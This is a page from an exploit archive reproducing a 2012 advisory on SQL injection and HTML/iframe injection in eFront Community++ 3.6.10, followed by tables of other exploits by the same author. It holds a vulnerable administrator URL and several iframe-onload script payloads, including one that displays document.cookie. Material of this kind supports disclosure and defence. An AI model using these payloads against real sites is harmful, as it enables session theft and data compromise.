Menu

Search for hundreds of thousands of exploits

"eFront Community++ 3.6.10 - SQL Injection / Multiple HTML Injection Vulnerabilities"

Author

Exploit author

"Benjamin Kunz Mejri"

Platform

Exploit platform

php

Release date

Exploit published date

2012-02-12

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
source: https://www.securityfocus.com/bid/51973/info

eFront Community++ is prone to an SQL-injection vulnerability and multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input data.

Exploiting these issues may allow an attacker to compromise the application, access or modify data, exploit vulnerabilities in the underlying database, execute HTML and script code in the context of the affected site, steal cookie-based authentication credentials, or control how the site is rendered to the user; other attacks are also possible.

eFront Community++ 3.6.10 is vulnerable; other versions may also be affected. 

SQL Injection:

http://www.example.com/communityplusplus/www/administrator.php?ctg=course&edit_course=-1'[SQL INJECTION!]

HTML Injection:

The vulnerabilities can be exploited by remote attacker with low or high required user inter action.
For demonstration or reproduce ...


<td xmlns="http://www.w3.org/1999/xhtml" class="layoutColumn center">
        <div id="messageBlock" class="block">
        
<div class="blockContents messageContents">
         <table class="messageBlock">
             <tbody><tr><td>
<img title="_FAILURE" alt="_FAILURE" class="sprite32 sprite32-warning" src="themes/default/images/others/transparent.gif"/>
</td>
              <td class="failureBlock">.....Invalid login name: "> (403)  <a onclick="eF_js_showDivPopup('Error 
Details', 2, 'error_details')" href="javascript:void(0)">More info</a></td>
              <td><img onclick="window.Effect 
? new Effect.Fade($('messageBlock')) : document.getElementById('messageBlock').style.display = 'none';" title="Close" 
alt="Close" class="sprite32 sprite32-close" src="themes/default/images/others/transparent.gif"/></td></tr>
            
</tbody></table>
        </div>
        </div>  <table class="centerTable">

...or 
<tr class="oddRowColor">
<td>
<img title="Forum" alt="Forum" class="forumIcon sprite32 sprite32-forum" 
src="themes/default/images/others/transparent.gif"/><div>
<a href="/communityplusplus/www/administrator.php?ctg=
forum&forum=6">"><iframe a="" <<="" onload='alert("VL")' src="a">
                                 
<p></p>
                                </div>
                            
</td>
<td>0 Subforums, 0 Topics, 0  Messages       
</td>
       <td><span class = "emptyCategory">Never</span>

</td>
       <td class = "centerAlign">


...or
<div>

<a style="white-space: normal;" class="smallHeader" href="/communityplusplus/www/administrator.php
?ctg=forum&poll=1">"><iframe a="" <<="" onload="alert(document.cookie)" src="a">
                                                  <p><p>"><iframe src=a onload=alert(document....</p></div>

</td>                                         

...or    
<tr class="oddRowColor defaultRowHeight">.....<td colspan="3" class="emptyCategory">No data found</td></tr>
                                            
<tr class="defaultRowHeight"><td colspan="4" class="sortedTableFooter"><div class="sortTablefilter"><span 
id="languagesTable_currentFilter" style="display: none;">"><iframe span="" <<="" onload='alert("VL")' 
src="a"/></span><input type="text" id="0_sortedTable_filter" onkeypress="if (event.which == 13 || event.keyCode == 13) 
{eF_js_filterData(0); return false;}" value=""><iframe src=a onload=alert("VL") <" onclick='if 
(this.value.match("Filter...")) this.value = "";'/></div><span style="vertical-align: middle;">Rows: </span><select 
onchange="numRows = parseInt(this.options[this.selectedIndex].value);eF_js_changeRowsPerPage(0, numRows)"


...or
</tr><tr>

<td class="calendar ">
<a href="administrator.php?ctg=calendar&view_calendar=1327968000"/></td>
<td class="calendar "><a href="administrator.php?ctg=calendar&view_calendar=1327968000"/></td>

<td class="calendar ">
                    <a href="administrator.php?ctg=calendar&view_calendar=1328054400">1</a></td>

<td class="calendar ">
                    <a href="administrator.php?ctg=calendar&view_calendar=1328140800">2</a></td>
<td class="calendar ">
                    <a href="administrator.php?ctg=calendar&view_calendar=1328227200">3</a></td>
<td class="calendar ">
                    <a href="administrator.php?ctg=calendar&view_calendar=1328313600">4</a></td>
<td class="calendar ">
                    <a href="administrator.php?ctg=calendar&view_calendar=1328400000">5</a></td>
</tr>
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2013-09-23 "SilverStripe CMS - Multiple HTML Injection Vulnerabilities" webapps php "Benjamin Kunz Mejri"
2013-09-10 "eTransfer Lite - 'file name' HTML Injection" webapps php "Benjamin Kunz Mejri"
2013-07-17 "Barracuda CudaTel - Multiple Cross-Site Scripting Vulnerabilities" remote hardware "Benjamin Kunz Mejri"
2013-07-09 "Air Drive Plus - Multiple Input Validation Vulnerabilities" remote ios "Benjamin Kunz Mejri"
2013-02-23 "File Manager - HTML Injection / Local File Inclusion" webapps php "Benjamin Kunz Mejri"
2013-02-14 "Dell SonicWALL Scrutinizer - Multiple HTML Injection Vulnerabilities" remote multiple "Benjamin Kunz Mejri"
2012-12-01 "Fortinet FortiWeb (Multiple Appliances) - Multiple Cross-Site Scripting Vulnerabilities" remote hardware "Benjamin Kunz Mejri"
2012-09-18 "AxisInternet VoIP Manager - Multiple Cross-Site Scripting Vulnerabilities" webapps cgi "Benjamin Kunz Mejri"
2012-08-06 "Worksforweb iAuto - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities" webapps multiple "Benjamin Kunz Mejri"
2012-08-02 "Barracuda Email Security Service - Multiple HTML Injection Vulnerabilities" remote hardware "Benjamin Kunz Mejri"
2012-08-02 "WordPress Theme ShopperPress - SQL Injection / Cross-Site Scripting" webapps php "Benjamin Kunz Mejri"
2012-08-01 "Distimo Monitor - Multiple Cross-Site Scripting Vulnerabilities" webapps php "Benjamin Kunz Mejri"
2012-07-18 "Barracuda SSL VPN - 'launchAgent.do?return-To' Cross-Site Scripting" remote hardware "Benjamin Kunz Mejri"
2012-07-18 "Barracuda SSL VPN - 'fileSystem.do' Multiple Cross-Site Scripting Vulnerabilities" remote hardware "Benjamin Kunz Mejri"
2012-07-16 "Simple Machines 2.0.2 - Multiple HTML Injection Vulnerabilities" webapps php "Benjamin Kunz Mejri"
2012-07-12 "Phonalisa - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities" webapps php "Benjamin Kunz Mejri"
2012-06-28 "Mobile USB Drive HD - Multiple Local File Inclusion / Arbitrary File Upload Vulnerabilities" webapps hardware "Benjamin Kunz Mejri"
2012-03-08 "Barracuda CudaTel Communication Server 2.0.029.1 - Multiple HTML Injection Vulnerabilities" remote hardware "Benjamin Kunz Mejri"
2012-02-22 "Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities" webapps php "Benjamin Kunz Mejri"
2012-02-12 "eFront Community++ 3.6.10 - SQL Injection / Multiple HTML Injection Vulnerabilities" webapps php "Benjamin Kunz Mejri"
2012-02-10 "Dolibarr ERP/CRM 3.x - '/adherents/fiche.php' SQL Injection" webapps php "Benjamin Kunz Mejri"
2012-01-10 "SonicWALL AntiSpam & EMail 7.3.1 - Multiple Vulnerabilities" remote multiple "Benjamin Kunz Mejri"
2011-12-20 "Cyberoam UTM 10 - 'tableid' SQL Injection" webapps php "Benjamin Kunz Mejri"
2011-11-01 "Hyperic HQ Enterprise 4.5.1 - Cross-Site Scripting / Multiple Security Vulnerabilities" webapps jsp "Benjamin Kunz Mejri"
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.